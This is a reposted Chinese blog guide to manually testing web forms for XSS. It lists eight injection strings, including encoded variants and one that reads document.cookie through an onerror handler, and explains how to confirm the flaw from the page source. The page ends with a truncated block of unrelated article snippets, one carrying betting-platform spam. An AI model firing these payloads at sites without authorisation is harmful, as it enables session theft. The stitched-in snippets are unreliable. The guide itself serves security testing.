轉:xss注入方法及驗證方法
注:本文描述的是一般情況的xss注入方法及驗證方法,並無覆蓋所有xss情況,
步驟1:在任一輸入框中輸入以下注入字元
>"'><script>alert(XSS)</script>
>"'><img src="javascript:alert(123456)">
1234<%00script>alert("123456")</script>
&{alert(123456)}
>%22%27><img%20src%3d%22javascript:alert(123456)%22>
[rm]"><img src=1 onerror=alert(document.cookie)>[/rm]
\u003cimg src=1 onerror=alert(/xss/)\u003e
\x20\x27onclick\x3dalert\x281\x29\x3b\x2f\x2f\x27
步驟2:提交成功後,在讀取引數的頁面檢視頁面原始碼,搜尋剛輸入注入
即:在【A頁面】提交的,要在能檢視A頁面提交的內容的【B頁面】搜尋原始碼才有效
如:在【A頁面】輸入框輸入 >"'><script>alert(123456)</script>,提交成功後,在【B頁面】搜尋“123456”
步驟3:檢視頁面原始碼
情況1:看到頁面原始碼為
有xss問題
解析:頁面並沒將字元 “<” 轉義,瀏覽器會執行此程式碼 ,此類屬於xss漏洞 。
情況2:看到原始碼為
解析:頁面已將輸入的字元“<”轉義成“";”,此類沒有xss漏洞。
情況3:頁面錯位
解析:頁面並沒將字元 “<” 轉義,瀏覽器會執行此程式碼 ,此類屬於xss漏洞 。
情況4:頁面有彈出框提示
解析:頁面並沒將字元 “<” 轉義,瀏覽器會執行此程式碼 ,此類屬於xss漏洞 。
可以認為,所有沒有轉義字元“<”的都屬於存在xss注入漏洞。
ps.頁面原始碼,並非審閱元素,兩者是有區別的
相關推薦
轉:xss注入方法及驗證方法
注:本文描述的是一般情況的xss注入方法及驗證方法,並無覆蓋所有xss情況, 步驟1:在任一輸入框中輸入以下注入字元 >"'><script>alert(XSS)</script> >"'><img src="j
Qt5.5.1和Qt5.3.2編譯OCI驅動教程及驗證方法
oracle下載 電腦 博客 size 版權 ring nbsp scott 所有 我們都知道oracle數據庫的強大,並且好多企業或者教學用到數據庫時都會推薦使用。但是Qt因為版權問題沒有封裝oracle數據庫專用驅動,網上也有一大堆說法和教程,但是或多或少的都有問題。下
js數據類型OA北京轉賽車平臺出租換及常用方法、內置對象
fine 頂層函數 second 小寫 最後一個元素 min 不存在 eth from Date 對象OA北京轉賽車平臺出租 haozbbs.com Q1446595067 Date 對象用於處理日期和時間。創建 Date 對象的語法: var myDate=new D
XSS 漏洞原理及防禦方法
正則表達 內容 規則 分享 保存 名單 nbsp 只需要 服務 XSS跨站腳本攻擊:兩種情況。一種通過外部輸入然後直接在瀏覽器端觸發,即反射型XSS;還有一種則是先把利用代碼保存在數據庫或文件中,當web程序讀取利用代碼並輸出在頁面上時觸發漏洞,即存儲型XSS。 危害:前端
Android Studio遇到的錯誤:java.lang.NullPointerException及解決方法
使用Android Studio,執行Textview.settext時遇到的誤:java.lang.NullPointerException,空指標異常,如下: Caused by: java.lang.NullPointerException
SPF 記錄:原理、語法及配置方法簡介
SPF,全稱為 Sender Policy Framework,即發件人策略框架。 當前 Email 通訊,還是在使用 SMTP 這個協議。SMTP 的全稱為 Simple Mail Transfer Protocol,即「簡單郵件傳輸協議」。正如它的名字鎖暗示的,SMTP
jQuery Mobile頁面跳轉導致css失效原因及解決方法
JQM頁面跳轉的時候預設是ajax方式的,也就是說,只有第一次請求頁面,$(document).ready();才會觸發,而不是每一次跳轉都會觸發ready事件。 這就導致由a畫面跳轉到b畫面的時候,瀏覽器只會只會把b.html中<page>內的內容載入進dom,而<p
轉:Intellij IDEA2017.3永久啟用方法
本想轉載博主的文章,奈何沒找到。在此處新增來源http://blog.csdn.net/the_lonely_sky/article/details/79211914 隨著idea不斷地發展,eclipse的缺點日漸明顯,為了能夠獲得良好的編碼體驗,越來越多的朋友轉向
HttpURLConnection碰到連續302跳轉的問題的原因及解決方法
用HttpURLConnection聯網的程式碼: HttpURLConnection conn = null; URL url = new URL("http://10.0.0.172/"); conn = (HttpURLConn
Java Filter過濾xss注入非法引數的方法
http://blog.csdn.net/feng_an_qi/article/details/45666813 web.xml: <filter> <filter-name>XSSFiler&l
[轉]exynos 4412 eMMC配置及使用方法
exynos 4412 eMMC配置及使用方法 /** @author Maoxiao Hu @version V1.0.0 @date Feb-2015 < COPYRIGHT 2015 ISE of SHANDONG
javascript注入攻擊及防止方法
<%@ Page Language="C#" MasterPageFile="~/Views/Shared/Site.Master" AutoEventWireup="true" CodeBehind="Index.aspx.cs" Inherits="CustomerFeedback.Views.Ho
淺析Linux 64位系統虛擬地址和實體地址的對映及驗證方法
# 虛擬記憶體 先簡單介紹一下作業系統中為什麼會有虛擬地址和實體地址的區別。因為Linux中有程序的概念,那麼每個程序都有自己的獨立的地址空間。 現在的作業系統都是64bit的,也就是說如果在使用者態的程序中建立一個64位的指標,那麼在這個程序中,這個指標能夠指向的範圍是0~0xFFFFFFFFFFFFFF
轉:Java對象及對象引用變量
棧空間 字符 new 包含 訪問 class 簡單的 構造函數 第一個 Java對象及其引用 關於對象與引用之間的一些基本概念。 初學Java時,在很長一段時間裏,總覺得基本概念很模糊。後來才知道,在許多Java書中,把對象和對象的引用混為一談。可是,如果
Java方法及構造方法
java設計 tro intro 二進制文件 多個 指針 類加載 進制 靜態區 *************************構造函數(構造方法、構造器)Constructor************ 一.why 為什麽用 Student s1 = new Studen
面向物件——普通方法及構造方法及帶參方法和方法過載
普通方法 類的方法是為了完成某個特定的應用程式功能存在的,我們要實現程式的某些功能的時候,一般都是某些類的功能,比如上一篇中的學生類,有一個展示學生資訊的方法,我們就可以把它放到學生類裡面(因為只要是學生,他就都有這個展示資訊的功能),而方法是有返回值的,也可以沒有返回值,返回型別為void。有返回值的
web前端課程技術總結Node.js 使用方法及相關方法分析
測試 一個 ejs 強制 req != server 跨域 ade Node.js 使用方法及相關方法分析 首先我們要了解什麽是node.js? 官方解釋是:node.js是一個基於Chrome v8引擎的javascript 運行環境。Node.js使用了一個事件驅動、非
web安全系列(一):XSS 攻擊基礎及原理
跨站指令碼攻擊(XSS)是客戶端指令碼安全的頭號大敵。本文章深入探討 XSS 攻擊原理,下一章(XSS 攻擊進階)將深入討論 XSS 進階攻擊方式。 本系列將持續更新。 XSS 簡介 XSS(Cross Site Script),全稱跨站指令碼攻擊,為了與 CSS(Cascading Style Sheet)
轉:MiniGUI的介紹及安裝
1. 介紹 MiniGUI是一個針對嵌入式裝置的高階視窗系統,,圖形使用者介面支援系統。能夠支援包含Linux在內的多種作業系統,例如uClinux、VxWorks、eCos、uC/OS-II、pSOS、ThreadX、Nucleus、OSE等,也可以在
C# 反射詳解:定義、建立物件、呼叫例項方法及靜態方法
1、反射的定義及功能介紹:審查元資料並收集關於它的型別資訊的能力。元資料(編譯以後的最基本資料單元)就是一大堆的表,當編譯程式集或者模組時,編譯器會建立一個類定義表,一個欄位定義表,和一個方法定義表等。可能這些說的比較抽象。我再從另一個角度來說:反射是.Net中